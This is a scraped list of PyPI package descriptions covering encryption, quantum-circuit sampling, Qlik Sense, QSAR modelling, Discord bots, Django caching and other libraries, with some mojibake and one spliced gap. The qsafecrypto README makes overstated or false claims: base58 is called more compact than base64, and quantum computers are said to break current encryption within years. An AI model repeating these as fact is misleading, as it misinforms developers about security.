It offers easy AES-GCM-256 encryption and decryption, ensuring quantum-safe security.DocumentationFind more in the -Documentations\u00f0\u0178\u00a7\u00aeInstallationYou can install QSafeCrypto using pip:pip install qsafecryptoUsageImport theencryptanddecryptfunctions from the QSafeCrypto package:fromqsafecrypto.aes_gcm_256importencrypt,decryptfromqsafecryptoimportutilEncryptionEncrypt a payload using AES-GCM-256 encryption:data=\"Hello, world!\"key=\"8A6KcShDcvd1jbTBBuTKQupizA7xGivh\"# A 32-byte-key. To generate one use util.random_key_generate(length=32)verification_key=\"myappnameaskey\"# Length & uniqueness doesn't matter.encrypted_data=encrypt(data,key,verification_key)print(\"Encrypted data:\",encrypted_data)# Encrypted data: Vu5YayfedA8NEsaLxMKzn3HNrDWzpkiM3w8VztPLHyqL3ynQSShM3ZjeTheencryptfunction takes the payload, encryption key, and verification key as arguments. By default, it returns the encrypted ciphertext as a string. You can set thedecodeparameter toFalseto receive the ciphertext as bytes.DecryptionDecrypt a encrypted_data using AES-GCM-256 decryption:# encrypted_data = \"Vu5YayfedA8NEsaLxMKzn3HNrDWzpkiM3w8VztPLHyqL3ynQSShM3Zje\"# key = \"8A6KcShDcvd1jbTBBuTKQupizA7xGivh\"# verification_key = \"myappnameaskey\"decrypted_data=decrypt(encrypted_data,key,verification_key)print(\"Decrypted data:\",decrypted_data)# Decrypted data: \"Hello, world!\"Thedecryptfunction takes the ciphertext, decryption key, and verification key as arguments. By default, it returns the decrypted plaintext as a string. Setting thedecodeparameter toFalsewill return the plaintext as bytes.File encyption and decyptionYou can import these two utility function to encode and decode files easily.fromqsafecrypto.utilimportencode_file,decode_fileExample and usage :File Encryption & DecryptionNoteAES-GCM-256 is used for encryption and decryption, as it is considered quantum-safe.Ensure that the same key and verification key used during encryption are provided for successful decryption.AES-GCM-192 and AES-GCM-128 are not supported by choice.Why QSafeCrypto?Cryptography is easy to implement but challenging to implement properly. There are only a few correct ways to do it, but many ways to make mistakes. Additionally, the threat of quantum computers is becoming increasingly evident. Quantum computers have the potential to decipher most existing encryptions through sheer computing power. In this new brave world, we must be prepared. It's time to adopt quantum-safe encryption everywhere, from databases to user confidential information. Everything needs to be encrypted.Brilliant minds in the world have developed algorithms that are deemed safe against quantum computers for the foreseeable future. AES-GCM-256 is one such algorithm.This is why QSafeCrypto embarks on its journey. Although we started with only one algorithm, our goal is to expand our algorithm list.Why I built and use QSafeCrypto, and why you should use itI was coding for my startup, Mindread.io. I was storing the data in key-value pairs in memory to get the fastest possible results. I received the data in JSON format and stored it as a single string after stringifying it. As a SaaS, I don't have the luxury of sending user data to other vendor-provided databases that are encrypted at rest. I have to do it myself. I felt the need to encrypt and decrypt user data. So, how could I encrypt and decrypt it? I started by searching Google for best practices.There is a simple approach: encrypt it with a key, and then decrypt it with the same key. 
However, I came across a talk by an industry veteran who urged everyone to use quantum-safe encryption to store user data, especially important data. Why? Because in 4-5 years, quantum computers will be able to crack these encryption methods.I thought, \"That's not my problem.\" There's a term in chess: \"Never defend your pieces early against possible attacks.\" So, it will happen in 4-5 years, and then I'll re-encrypt everything.Then, he dropped another bombshell. He said that big hackers are collecting encrypted data in the air and hoarding it en masse. They believe that once quantum computers can crack it, they will be able to see the data. Many data sets will not become stale and will remain relevant. For example, a customer's name, gender, age, and email address. These data sets could be leaked and pose a serious threat.Hmmm... That's pretty concerning. So, what should we do? The protagonist then said, \"Just start implementing quantum-safe encryption from now on. It's the safest bet.\"So, I started researching how to implement quantum-safe encryption. First, I had to find which encryption algorithms are safe from quantum attack. I found a debatable list. NIST has not yet released an official list, but researchers have found a few that are relatively safe.However, I found it very challenging to use existing solutions. Extensive theoretical knowledge was required, and another popular solution, Pycryptodome, also had its complications.During my research, I discovered the Google TINK cryptography library, which was incredibly helpful. However, it still involved substantial theoretical understanding and installation hurdles. Additionally, there was a potential vendor lock-in risk. Most of the time, developers had to be knowledgeable about what they were doing and not \"shoot themselves in the foot.\" Finally, I made the difficult decision to build QSafeCrypto from scratch. After a long research and reading a gazillion amount of internet resources and Stack Overflow questions, I finally implemented it.Since then, the library has been used in production and has successfully encrypted millions of megabytes of data with lower latency and improved ease of use. Now, as a time-tested program, I wanted to make it open source.As I am working with a team, lecturing CS theories like proper nonce and associated tag bytes to make them understand the thing seems difficult. So, I wrapped everything in a simple package and told them to just use the encrypt() and decrypt() functions.I had four requirements for developing it. I followed them religiously.The library must include two functions: one for encryption and another for decryption.A key will be necessary, stored either in the environment variable or in the Key Management System (KMS), which will be used for encryption and decryption.The library must be performant and quantum-safe.It should be designed in a way that even developers cannot easily make errors. Additionally, the encrypted keys should have an aesthetically pleasing appearance.I chose AES-GCM-256 for four reasons as well:It's never been cracked while being quantum-safe!Companies like Signal are using it in their chatting app. Google's Tink library also chooses this algorithm. Big tech are 3. already using it. 
There is enough social proof.It's fast because there is chip-level support provided by major vendors for this particular algorithm.There is already a supporting Python library with first-class support.Use it to get quantum-safe encryption and decryption from today, easily.How I distilled all the complexities, theories, and parameters into two simple functions?I took inspiration from Google Tink and followed best practices, sticking to my four core requirements without compromise.For AES-GCM-256, each operation requires a unique \"nonce\" key for decryption. To simplify this, I dynamically generate the nonce and merge it with the encrypted key. Developers are relieved from handling the nonce or determining its byte sizes. This approach, inspired by Google TINK, streamlines the process.To ensure verification and authenticity, associated data or tags are crucial. I merge this data into the key, making it easy to verify the data's origin.Overall, my implementation simplifies the handling of nonces and associated data, thanks to the ideas and practices employed by Google Tink.On the other hand to enhance visual appeal, I transformed the key into base58 encoding, resembling a crypto wallet address. This eliminates trailing equal signs commonly found in base64 encoded data. The process relies on a RUST-based library for efficient base58 encoding. Enjoy a visually pleasing key representation without any trailing equal signs.As an example, let's compare the base58 and base64 versions of the same encryption:Base58:s6xFAQPiTDxf97Pw9dtdyUuyWYqD8MiiJAyyo5inSk5zVWm6ifgCDP2Base64:A/Ba6xs3S2lhowPdCdJOsTf+Mv6gt16jhTAfcfG3LfJNJFZep/NkYFU=Why our encrypted data is designed to be human-friendlyBase58 is chosen over base64 for its human-friendly representation. The decision to prioritize human-friendliness led to the selection of base58 encoding over base64.Human-friendly representation: Base58 encoding uses a character set that excludes visually similar characters, making it more human-friendly. It avoids ambiguous characters like \"0\", \"O\", \"I\", and \"l\" that can easily be mistaken for each other. This makes base58 encoding suitable for scenarios where the encoded data needs to be read or communicated by humans, such as in crypto wallet addresses or other user-facing contexts. Qsafecrypto sees a future where every app, interaction is encrypted. So user will see lots of encrypted data in their app.Compact representation: Base58 encoding typically results in a shorter encoded string compared to base64 encoding. By excluding certain characters, base58 achieves a more compact representation, which can be beneficial when dealing with limited space or optimizing data storage. This can be advantageous in scenarios where shorter identifiers or representations are preferred.Padding-free: Base58 encoding does not require padding, as opposed to base64 encoding which uses padding characters (\"=\") to ensure a length divisible by 4. The absence of padding simplifies the handling and manipulation of the encoded data, making base58 more convenient in certain applications.At Qsafecrypto, we envision a future where encryption is ubiquitous, ensuring secure interactions within every application. In this future, users will encounter abundant encrypted data in their apps. Therefore,human-friendliness is of utmost importance in our design philosophy. 
We strive to create visually pleasing and user-friendly encrypted keys.Leveraging a high-performance base58 encoder-decoder implemented in Rust, we ensure that aesthetic appeal does not come at the cost of performance. With Qsafecrypto, enjoy the perfect blend of security and user-centric design.Contribution\u00f0\u0178\u00a7\u00b5 This package is developed byMd Fazlul Karim, co-founder of Mindread.io. Special thanks to him for his valuable contributions to this project.If you would like to contribute to this project, please feel free to submit a pull request or open an issue. We welcome any suggestions, bug reports, or enhancements.Please make sure to update tests as appropriate.LicenseMIT"} +{"package": "qsample", "pacakge-description": "qsampleInstallpip install qsamplePrerequisitespython3pdflatex (for circuit rendering)When to useFor QEC protocols with in-sequence measurements and feed-forward of\nmeasurement informationApply circuit-level incoherent Pauli noise at low physical error rates\n(i.e.\u00a0high fidelity physical operations)Simulate and sample protocol execution over ranges of varying physical\nerror rates, using customizable callbacksGetting startedimportqsampleasqs# import qsampleimportmatplotlib.pyplotasplt# import matplotlib for visualization of resultsFirst, we need to define a quantum protocol of which we would like to\nknow the logical error rate. Inqsamplea protocol is represented as a\ngraph of quantumCircuits as\nnodes and transitionchecks(to be checked at samplingt ime) as edges.Example: To sample logical error rates of an error-corrected quantum\nstate teleportation protocol, we define the teleportation circuit which\nsends the state of the first to the third qubit.teleport=qs.Circuit([{\"init\":{0,1,2}},{\"H\":{1}},{\"CNOT\":{(1,2)}},{\"CNOT\":{(0,1)}},{\"H\":{0}},{\"measure\":{0,1}}])teleport.draw()Additionally, we need a circuit to (perfectly) measure the third qubit\nafter runningteleport. If the outcome of this measurement is 0\n(corresponding to the initially prepared $|0\\rangle$ state of qubit 1)\nthe teleportation succeded. If the outcome is 1 however, we want to\ncount a logical failure of this protocol. Let\u2019s create a circuit for\nthis measurement and let\u2019s assume we can perform this measurement\nwithout noise.meas=qs.Circuit([{\"measure\":{2}}],noisy=False)Between theteleportandmeascircuits apply a correction to qubit 3\nconditioned on the measurement outcome (syndrome) of the teleportation\ncircuit. We define the lookup functionlutdeflut(syn):op={0:'I',1:'X',2:'Z',3:'Y'}[syn]returnqs.Circuit([{op:{2}}],noisy=False)Finally, define the circuit sequence and transition logic together\nwithin aProtocolobject. Note that protocols must always commence with a uniqueSTARTnode and terminate at a uniqueFAILnode, where the latter expresses a\nlogical failure event.tele_proto=qs.Protocol(check_functions={'lut':lut})tele_proto.add_nodes_from(['tele','meas'],circuits=[teleport,meas])tele_proto.add_edge('START','tele',check='True')tele_proto.add_edge('tele','COR',check='lut(tele[-1])')tele_proto.add_edge('COR','meas',check='True')tele_proto.add_edge('meas','FAIL',check='meas[-1] == 1')tele_proto.draw(figsize=(8,5))Notice that we do not define any initial circuit for the correctionCORbut pass our lookup function to thecheck_functionsdictionary,\nwhich makes it accessible inside thechecktransition statements\n(edges) between circuits. 
This way we can dynamically insert circuits\ninto the protocol at execution time.After the protocol has been defined we can repeatedly execute\n(i.e.\u00a0sample) it in the presence of incoherent noise. Let\u2019s say we are\ninterested in the logical error rates for physical error rates on all 1-\nand 2-qubit gates of $p_{phy}=10^{-5}, \\dots, 10^{-1}$, and $0.5$. The\ncorresponding noise model is calledE1in qsample. The\ngroups of all 1- and 2-qubit gates are indexed by the keyqinE1. Other noise\nmodels (and their parameters) are described in the documentation.err_model=qs.noise.E1err_params={'q':[1e-5,1e-4,1e-3,1e-2,1e-1,0.5]}We are ready to sample. As our protocol only contains Clifford gates\nlet\u2019s choose theStabilizerSimulator,\nas well as thePlotStatscallback for plotting the resulting logical error rate as function of\n$p_{phy}$.sam=qs.DirectSampler(protocol=tele_proto,simulator=qs.StabilizerSimulator,err_model=err_model,err_params=err_params)sam.run(n_shots=20000,callbacks=[qs.callbacks.PlotStats()])p=('1.00e-05',): 0%| | 0/20000 [00:00>>importqsAPIOr just a simple command line console if complex scripts are no needed:UsageConnecting with certificatesThe first step is to build a handler invoking the constructor of the class you will use containing the host parameters, this will attempt to connect to the Qlik Sense server. Just export previously from QlikSense console the certificate in portable format and copy the folder in your machine:>>>qrs=qsAPI.QRS(proxy='hostname',certificate='path\\\\client.pem')Connecting with windows credentials (NTLM)Alternatively, the constructor accept user credentials via arguments.>>>qrs=qsAPI.QRS(proxy='hostname',user=('yor_domain','username','password'))ExamplesCount users using a filterqrs.count('user',\"Name eq 'sa_repository'\")Duplicate an application in the serverqrs.AppCopy('a99babf2-3c9d-439d-99d2-66fa7276604e',\"HELLO world\")Export an applicationqrs.AppExport('a99babf2-3c9d-439d-99d2-66fa7276604e',\"c:\\\\path\\\\myAppName.qvf\")Export all published applications to directoriesforappinqrs.AppGet(pFilter=\"stream.name ne 'None'\"):os.makedirs(app['stream']['name'],exist_ok=True)qrs.AppExport(app['id'],app['stream']['name']+'\\\\'+app['name'])Retrieve security rules using a filterqrs.SystemRulesGet(\"type eq 'Custom'\")Retrieve a list of sessions for a user[x['SessionId']forxinqps.GetUser('DIR','name').json()]teardown of all connections for the user and related sessionsqps.DeleteUser('DIR','name')More examplesTake a look at the Wiki area: (https://github.com/rafael-sanz/qsAPI/wiki)Command LineAlternative use as command line is available too, examples:qsAPI --help\nqsAPI -s myServer -c dir/client.pem -Q QRS TaskStartbyName \"Reload License Monitor\"\nqsAPI -s myServer -c dir/client.pem -Q QRS -v INFO AppExport d8b120d7-a6e4-42ff-90b2-2ac6a3d92233\nqsAPI -s myServer -c dir/client.pem -Q QRS -v INFO AppReload 79f0c591-67de-4ded-91ae-4865934a5746TODOThe module is in progress, a subset of methods are implemented. But all the endpoints could be implemented through the inner classdriverand the methodsget, post, put, delete.qps.driver.get('/qrs/about/api/enums')LicenseThis software is made available \"AS IS\" without warranty of any kind. Qlik support agreement does not cover support for this software."} +{"package": "qsarify", "pacakge-description": "qsarifyqsarify is a library of tools for the analysis of QSAR/QSPR datasets and models. 
This library is intended to be used to produce models which relate a set of calculated chemical descriptors to a given numeric endpoint. Many great tools will take the geometry or string data of a given chemical and computedescriptors, which are numeric measures of the properties of these, but you can generate some of these with another one of my scripts,Free Descriptors.DependenciesPython 3numpypandasscikit-learnmatplotlibInstallationpip install qsarifyWhat is included right now?Data preprocessing tools:data_toolsDimensionality reduction via clustering:clusteringFeature selection:Single threaded:feature_selection_singleMulti-threaded:feature_selection_multiModel Export and Visualization:model_exportCross Valiidation:cross_validationHow to useThe best way to learn how to use this library is to look at the example notebook in theexamplesfolder. This notebook will walk you through the workflow of using this library to build a QSAR model.Future PlansMassively parallel feature selection methods:CUDA accelerationMPI accelerationInclude Shannon Entropy as a dimensionality reduction metric in clusteringEmbedded kernel methodsMore visualization toolsMore cross validation toolsFeature selection tools for categorical dataContributingIf you would like to contribute to this project, please feel free to fork this repository and submit a pull request. Otherwise, you may also submit an issue. I will try to respond to issues as quickly as possible.LicenseThis project is licensed under the GNU GPLv3 license. See the LICENSE file for more details.CitationIf you use this library in your work, please cite it as follows:Szwiec, Stephen. (2023). qsarify: A high performance library for QSAR model development.BibTex:@misc{szwiec2023qsarify,\n author = {Szwiec, Stephen},\n title = {qsarify: A high performance library for QSAR model development},\n year = {2023},\n publisher = {GitHub},\n journal = {GitHub repository},\n howpublished = {\\url{https://github.com/stephenszwiec/qsarify}},\n }"} +{"package": "qsarmodelingpy", "pacakge-description": "QSARModelingPy CoreQSARModeling\u00e9 uma ferramenta gratuita e open-source para a constru\u00e7\u00e3o e valida\u00e7\u00e3o de modelos QSAR e QSPR.Originalmente desenvolvidoem Java, esta biblioteca em Python permite ao usu\u00e1rio a aplica\u00e7\u00e3o program\u00e1tica, personaliz\u00e1vel e escal\u00e1vel dos recursos do software.Alguns recursos podem ser destacados, como:Redu\u00e7\u00e3o de dimensionalidade baseada em vari\u00e2ncia, correla\u00e7\u00e3o e autocorrela\u00e7\u00e3o;Sele\u00e7\u00e3o de vari\u00e1veis: Ordered Predictors Selection (OPS) ou Algoritmo Gen\u00e9tico (GA)Valida\u00e7\u00e3o cruzada: y-randomization e leave-N-outValida\u00e7\u00e3o externaUsoEsta vers\u00e3o do QSARModelingPy Core \u00e9 uma biblioteca para a linguagem de programa\u00e7\u00e3o Python, com foco em programadores que desejam implementar sua pr\u00f3pria vers\u00e3o do QSAR Modeling, expandi-lo ou utiliz\u00e1-lo programaticamente. 
Se deseja uma vers\u00e3o funcional desenvolvida para o usu\u00e1rio final, veja asinterfaces do QSARModelingPy.Para utilizar, instale a biblioteca em seu ambiente.$pipinstallqsarmodelingpy"} +{"package": "qsarmodelingpy-gui", "pacakge-description": "QSARModelingPyQSARModelingPy is an open-source computational package to generate and validate QSAR models.What youcando with QSARModelingPySelect variables through either OPS or Genetic AlgorithmDimensionality reduction:Correlation cutVariance cutAutocorrelation cutValidate your models:Cross Validationy-randomization / Leave-N-outExternal ValidationUsageAfter installing this package with:$ pip install qsarmodelingpy-guiJust launch the application:$ qsarmodelingpyor:$ python -m qsarmodelingpy-gui"} +{"package": "qsavvy", "pacakge-description": "Qsavvysavvy's Quantum StuffDocumentation:https://anomius.github.io/qsavvyGitHub:https://github.com/anomius/qsavvyPyPI:https://pypi.org/project/qsavvy/Free software: BSD-3-ClauseFeaturesTODOCreditsThis package was created withCookiecutterand thewaynerv/cookiecutter-pypackageproject template."} +{"package": "qsbot", "pacakge-description": "qsbotAn extension of the discord.py library that makes the initial creation of a bot's code much easier.FeaturesBuilt in functions for easy 'react for role' setupSet welcome message and discord presenceSet single or multiple prefixes for commandsBuilt in command error catch (Probably will end up phasing this out or replacing it with something more practical)Generate starting code from the command lineRoadmapBasic examplesCommand to install examplesCommand to get basic starting code for bot creationServer statisticsCog supportEasy load tokenInstallNot yet on PyPI, I am waiting until this has more features before I add it there, but if this gets some stars then I may consider adding it early. You can still clone this repo and install from there though.git clone https://github.com/Dual-Exhaust/qsbot\n\ncd qsbot\n\npip install .qs_install_examplesA command line function that creates a sub-directory containing the qsbot examples in the current working directory.Usage: qs_install_examplesmakebotA command line function that generates code for you to start with.Usage: makebotOptional arguments-F | --filename : The name of the file generated. If not specified, it will be 'basic_bot.py' by default.-W | --welcome : The welcome message that your bot should send to new members.-P | --prefix : The prefix that your bot should use, if not set it is '$' by default.-Pr | --presence : The discord presence of your bot.-R | --react : How many 'react for role' calls to generate.qsbot.clientThe commands.Bot class from discord.ext.commands is the super class to this one, so initializing is virtually the same.\nNote that the default command prefix is set to '$' so you do not have to set one on initialization.client = qsbot.client(command_prefix='$', *args, **kwargs)Reaction for RolesThe logic behind adding and removing a reaction to add and remove a role is provided by default. You just have to pass what channel you want to listen to and specify what reactions give which roles.set_reaction_for_role_channelUsed to set which channel that the bot will listen to for when users add reactions to gain roles in the server. This must be set before you can use add_reaction_for_role. The channel can be passed as a channel id or as a channel name.Usage: client.set_reaction_for_role_channel( )add_reaction_for_roleUsed to link what reactions give which roles. 
The first parameter is the reaction name and the second is the role name. These are case sensative and as far as I know only work with custom emojis at the moment.Usage: client.add_reaction_for_role( , )Prefixesset_prefixesUsed to overwrite the default command prefix. This can be passed a single string or a list of strings to set a single or multiple prefixes respectively.Usage: client.set_prefixes( )get_prefixesUsed to return what the current prefixes are. Currently broken, and may also be a duplicate method of commands.Bot.get_prefix.Usage: client.get_prefixes()Presenceset_presenceUsed to set the bots presence in discord. The parameter is a string. Custom statuses have not yet been looked at.Usage: client.set_presence( )Welcome Messageset_welcome_messageSets the welcome message that is sent to the user when they join the server. If this is not set then the default behavior is to send no welcome message. The command can be passed a discord.Embed object or a regular string.Usage: client.set_welcome_message( )get_welcome_messageSimply returns the set welcome message. Returns None if it has not been set.Usage: client.get_welcome_message()On Readyset_on_ready_messageSets the message that gets printed to console when on_ready gets called.Usage: client.set_on_ready_message( )get_on_ready_messageReturns the message that gets printed when on_ready triggers. Returns None if not set.Usage: client.get_on_ready_message()on_readyWhen this triggers, the on_ready_message is printed to console and if a presence has already been specified, then it gets set. It does trigger at some odd times though, read thedocsfor more info about it.Command Error Behavioron_command_errorA default command error is included; however, I may be leaning towards disabling it by default and making it have to be enabled. Sends the discord user the error that occured during calling a command. The default behavior is bound to change as this is impractical."} +{"package": "qsc", "pacakge-description": "pyQSCPython implementation of the Quasisymmetric Stellarator Construction methodThis code implements the equations derived by Garren and Boozer (1991) for MHD equilibrium near the magnetic axis.View themain documentation here"} +{"package": "qscache", "pacakge-description": "qscacheA package for caching Django querysets with type hinting in mind.RequirementsDjango >= 3.0.12,<4.0.0django-redis == 5.0Installationpip install qscacheVersioningThis package is young so consider pining it with the exact version of package in production.\nPatch releases don't include any backward incompatible changes but major and minor releases may include backward incompatible changes.ExampleOur purpose is to keep the API simple and easy-to-use.\nYou must give theBaseCacheManagerclass to your cache classes kinda like how you create models in Django. 
For example:inmodels.py:from django.db import models \nfrom django.contrib.auth import get_user_model \n\n\nUser = get_user_model()\n\n \nclass Example(models.Model): \n\t\"\"\"Example\n\tA simple example Django model like before\n\t\"\"\"\n \n\tuser = models.ForeignKey(User, on_delete=models.CASCADE, related_name=\"example_user\") \n users = models.ManyToManyField(User, related_name=\"examples\") \n is_active = models.BooleanField(default=True)incache.py:from django.http import Http404\nfrom qscache import BaseCacheManager\n\nfrom .models import Example\n\n\nclass ExampleCacheManager(BaseCacheManager[Example]):\n\n\t# These are all the options you have but only model is required.\n\tmodel = Example\n\tcache_key = \"example\" \n\trelated_objects = [\"user\"]\n\tprefetch_related_objects = [\"users\"] \n\tuse_prefetch_related_for_list = True \n\tlist_timeout = 86400 # 1 day\n\tdetail_timeout = 60 # 1 minute\n\texception_class = Http404\n\nexample_cache_manager = ExampleCacheManager()This is all you need to do. now you are good to use your cache manager.# This is the equivalent to Example.objects.all()\n# It hits database first time we fetch example list\n# But later we fetch data from cache until cache is expired\n# It returns Queryset[Example]\nexample_list = example_cache_manager.all()\n\n# This is the equivalent to Example.objects.get(pk=1)\n# It hits database first time we fetch example list\n# But later we fetch data from cache until cache is expired\n# It returns an Example instance\nexample_object = example_cache_manager.get(\n\tunique_identifier=1, # pk = 1\n\tfilter_kwargs={\"pk\": 1},\n)Developer GuideNow lets look at how everything is working by detail.BaseCacheManageroptions:model:This is the only required field that you should specify in your model cache manager. We use this model to query database and fetch data.cache_key:The default value isNone. If it'sNonewe use the model lowercase class name. if you want to override it just use a string as cache key. We use this cache key as our cache key separator from other model cache keys. So make sure it's unique. Defaults toNone.cache_keyis our list cache key.cache_manager.all()will be stored incache_key.{cache_key}_{unique_identifier}is our detail cache key. if your unique identifier is pk(for example 1) then your detail cache key is{cache_key}_1.cache_manager.get()uses this cache key. your unique identifier can be anything but make sure it's unique so your objects won't be overridden in cache. For exampleslug,username, etc.related_objects:If your model has foreign keys and you want to useselect_relatedin your queries. Just pass a list containing your foreign key field names. Defaults toNone.prefetch_related_objects:if you wanna useprefetch_relatedin your query just add a list containing your many to many fields. Defaults toNone.use_prefetch_related_for_list:Your list query can be heavy and you may not need toprefetch_relatedfor your list query but you need it for the detail of your objects. If it's True then we useprefetch_related_objectsfor our list query but if not we don't useprefetch_related_objectsfor our list even though it's set we only use it for getting an object not getting list of objects. Defaults toTrue.list_timeout:This is the timeout of your list cache key in seconds. Defaults to 86400 (1 day).detail_timeout:This is the timeout of your detail cache key in seconds. Defaults to 60 (1 minute).exception_class:This the exception that we raise when object is not found incache_manager.get()method. Defaults toHttp404. 
But if you are usingrest_frameworkyou may want to raiserest_framework.exceptions.NotFoundinstead ofHttp404.Here areBaseCacheManagerthat you may want to override.\nNow lets look at your modelcache_managermethods.all(suffix: Optional[str] = None, filter_kwargs: Optional[Dict[str, Any]] = None) -> QuerySet[ModelType]:This is the equivalent toModel.objects.all(). But we store it incache_keyand we fetch it from cache if queryset was in the cache otherwise sets queryset to the cache.suffix: Optional[str] = None: This suffix is added to the end ofcache_keyif provided. It's useful when you want to store a filtered queryset in cache and you also don't want to override yourcache_manager.all()queryset.filter_kwargs: Optional[Dict[str, Any]] = None: If you want to filter your queryset you can use it and pass your filter as a dict. For example{\"name__icontains\": \"mojix\", \"is_active\": True}same as Django API. but it's better to usesuffixandfilter_kwargsat the same time. Then you can cache your filters when you are using them so much. For example if you have a page that you show all of the active products and you want to cache your active products instead of all of the products. You can do thisproduct_cache_manager.all(suffix=\"active\", filter_kwargs={\"is_active\": True}).Notice:What if you wanted to filter your queryset without caching it? imagine if it was a simple search that you don't want to cache it. Remember thatcache_manager.all()returnsQueryset[ModelType]. So you can use everything on it that you do in Django and you can use it even as your model manager. look that this example below:cache_manager.all() # only hits db first time\ncache_manager.all(suffix=\"active\", filter_kwargs={\"is_active\": True}) # only hits db first time too\n\n# This not even cached you can use all the functionallity that you had in Django\n# It executes another query because you are filtering a Django queryset\n# You can use .filter(), .annotate(), etc\n# It's like Model.objects.all().filter(is_active=True)\n# So it's not stored in cache and feel free to use it\ncache_manager.all().filter(is_active=True)So far so good and easy.\nMore coming soon :)"} +{"package": "qscan", "pacakge-description": "A Quasar Spectra Scanning ToolDescriptionThis program allows you to scan in velocity any quasar spectrum and with any transitions. This is very similar to RDGEN but with a more stable display. One can also select the fitting regions and prepare a preliminaryfort.13in order to start fitting with VPFIT.Installation & DependenciesThe program can be installed very easily using thepip Python package manageras follows:sudopipinstallqscanThe program was built using thePython Standard Libraryas well as 4 external Python packages:NumPy,Matplotlib,AstropyandSciPy.UsageThe usage is pretty straightforward and corresponds to the following:qscan--optionLicense(The MIT License)Copyright (c) 2016-2020, Vincent Dumont. 
All rights reserved.Permission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qsci", "pacakge-description": "Quantumscience is a tool designed to simplify the deployment of algorithms or applications onto quantum circuits. It builds upon the foundation of isqdeployer, which, in turn, utilizes isqc. As a result, qsci also possesses the potential to optimize circuit-level calculations.\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n \u2551 qsci \u2551 high level application \n \u255a\u2550\u2550\u2550\u2566\u2550\u2550\u2550\u2550\u255d\n \u2551 \n \u2554\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n \u2551 isqdeployer \u2551\n \u2551 \u2551\n \u2551 \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2557 \u2551 \u256d\u2500\u2500\u2500\u2500\u256e\n \u2551 \u2551pyisqc\u2560\u2550\u2550\u256c\u2550\u2550\u2550\u2561isqc\u2502 circuit optimization\n \u2551 \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u2551 \u2570\u2500\u2500\u2500\u2500\u256f \n \u255a\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u255d\n \u256d\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u256e \u2502 \u2502 \n \u2502 hardware\u2502 \u2502 \u2502 \n \u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f \u2502 \u2502\n \u256d\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u256e \u2502\n \u2502simulator\u2502 \u2502 \n \u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f \u2502\n \u256d\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256e\n \u2502user-defined\u2502 any prospective machine\n \u2502 backend \u2502\n \u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f"} +{"package": "qsck", "pacakge-description": "qsckPython library for serializing and deserializing a wonky format referred to\nas \".qs\" files. 
For full format specification, please read throughtests.test_serializeandtests.test_deserializetest suites and extrapolate.Quick StartUse Python \u2265 3.6 only.To install it, simply:pip3 install qsckSerializing DataVia Python:python3 -c \"import qsck; print(qsck.serialize('LOG', '1553302923', [\n ('first_key', 'some value'),\n ('2nd_key', [('attr1', 'foo'), ('attr2', 'bar')]),\n ('3rd_key', {'subKey1': '-3', 'subKey2': None}),\n ('4th_key', None)\n]))\"Out comes a \".qs\" record, like so:LOG,1553302923,first_key=some value,2nd_key={attr1=foo, attr2=bar},3rd_key={\"subKey1\":\"-3\",\"subKey2\":null},4th_key=(null)The library also supports serializing data by passing in a JSON file via\nthe command-line toolqs-format, one record per line:qs-format my-records.json > my-records.qsDeserializing DataVia Python:python3 -c \"import pprint, qsck; pprint.pprint(qsck.deserialize(\n 'LOG,1553302923,first_key=some value,2nd_key={attr1=foo, \\\n attr2=bar},3rd_key={\\\"subKey1\\\":\\\"-3\\\",\\\"subKey2\\\":null},4th_key=(null)'))\"Out comes a friendly Python collection:('LOG',\n '1553302923',\n [('first_key', 'some value'),\n ('2nd_key', [('attr1', 'foo'), ('attr2', 'bar')]),\n ('3rd_key', {'subKey1': '-3', 'subKey2': None}),\n ('4th_key', None)])The library-providedqs-parsecommand-line tool supports deserializing a whole\n\".qs\" log file, emitting one JSON record per input line to stdout:qs-parse my-records.qs > my-records.jsonContributingReally? Very welcome. Do the usual fork-and-submit-PR thingy.Running the tests:python setup.py testDistributing:pip3 install --upgrade twine wheel setuptools\npython setup.py sdist bdist_wheel\ntwine upload dist/*Changelog0.3- Better DeserializationAdds support for funky \"nested-nested lists\" in .qs recordsSquashing complex comma (,) values0.2\u2013 Deserialize AddedAdds support for de-serializing \".qs\" records.0.1\u2013 Initial ReleaseSupports serializing \".qs\" records."} +{"package": "qscollect", "pacakge-description": "SeeConfigurationwiki page for information on configuring QSCollect"} +{"package": "qscollect-withings", "pacakge-description": "UNKNOWN"} +{"package": "qs-cs-common-helpers", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qs-cs-config-parser", "pacakge-description": "No description available on PyPI."} +{"package": "qs-cs-sandbox-extractor", "pacakge-description": "No description available on PyPI."} +{"package": "qs-cs-script-foundry", "pacakge-description": "A cli way to update scripts and drivers to 